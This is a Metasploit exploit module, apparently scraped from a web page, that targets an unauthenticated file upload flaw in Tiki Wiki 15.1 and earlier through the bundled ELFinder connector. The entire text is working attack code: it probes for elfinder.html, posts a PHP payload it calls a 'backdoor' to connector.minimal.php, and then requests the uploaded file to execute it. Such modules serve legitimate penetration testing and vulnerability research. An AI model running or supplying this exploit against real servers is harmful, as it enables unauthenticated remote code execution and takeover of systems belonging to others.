require
'msf/core'
class
MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'Tiki Wiki Unauthenticated File Upload Vulnerability'
,
'Description'
=> %q{
This
module
exploits a file upload vulnerability
in
Tiki Wiki <=
15
.
1
which could be abused to allow unauthenticated users to execute arbitrary code
under the context of the webserver user.
The issue comes with one of the 3rd party components. Name of that components is
ELFinder -version
2
.
0
-. This components comes with default example page which
demonstrates file operations such as upload, remove, rename, create directory etc.
Default configuration does
not
force validations such as file extension, content-type etc.
Thus, unauthenticated user can upload
PHP
file.
The exploit has been tested on Debian
8
.x 64bit
and
Tiki Wiki
15
.
1
.
},
'Author'
=>
[
'Mehmet Ince <mehmet@mehmetince.net>'
],
'License'
=>
MSF_LICENSE
,
'References'
=>
[
],
'Privileged'
=>
false
,
'Platform'
=> [
'php'
],
'Arch'
=>
ARCH_PHP
,
'Payload'
=>
{
'DisableNops'
=>
true
},
'Targets'
=> [ [
'Automatic'
, {}] ],
'DefaultTarget'
=>
0
,
'DisclosureDate'
=>
'Jul 11 2016'
))
register_options(
[
OptString.
new
(
'TARGETURI'
, [
true
,
"Installed path of Tiki Wiki"
,
"/tiki/"
])
],
self
.
class
)
end
def
check
url = normalize_uri(target_uri.path,
"vendor_extra/elfinder/elfinder.html"
)
res = send_request_cgi(
'method'
=>
'GET'
,
'uri'
=> normalize_uri(url)
)
if
res && res.code ==
200
return
Exploit::CheckCode::Appears
end
return
Exploit::CheckCode::Safe
end
def
exploit
filename = rand_text_alpha(
8
+ rand(
4
)) +
'.php'
data = Rex::
MIME
::Message.
new
data.add_part(
'upload'
,
nil
,
nil
,
'form-data; name="cmd"'
)
data.add_part(
'l1_Lw'
,
nil
,
nil
,
'form-data; name="target"'
)
data.add_part(payload.encoded,
'application/octet-stream'
,
nil
,
"form-data; name=\"upload[]\"; filename=\"#{filename}\""
)
print_status(
"Uploading backdoor file."
)
res = send_request_cgi({
'method'
=>
'POST'
,
'uri'
=> normalize_uri(target_uri.path,
"vendor_extra/elfinder/php/connector.minimal.php"
),
'ctype'
=>
"multipart/form-data; boundary=#{data.bound}"
,
'data'
=> data.to_s
})
if
res && res.code ==
200
print_good(
"Backdoor successfully created."
)
else
fail_with(Failure::Unknown,
"#{peer} - Error on uploading file"
)
end
print_status(
"Trigging the exploit..."
)
send_request_cgi({
'method'
=>
'GET'
,
'uri'
=> normalize_uri(target_uri.path,
"vendor_extra/elfinder/files/"
+ filename)
},
5
)
end
end
0 Comments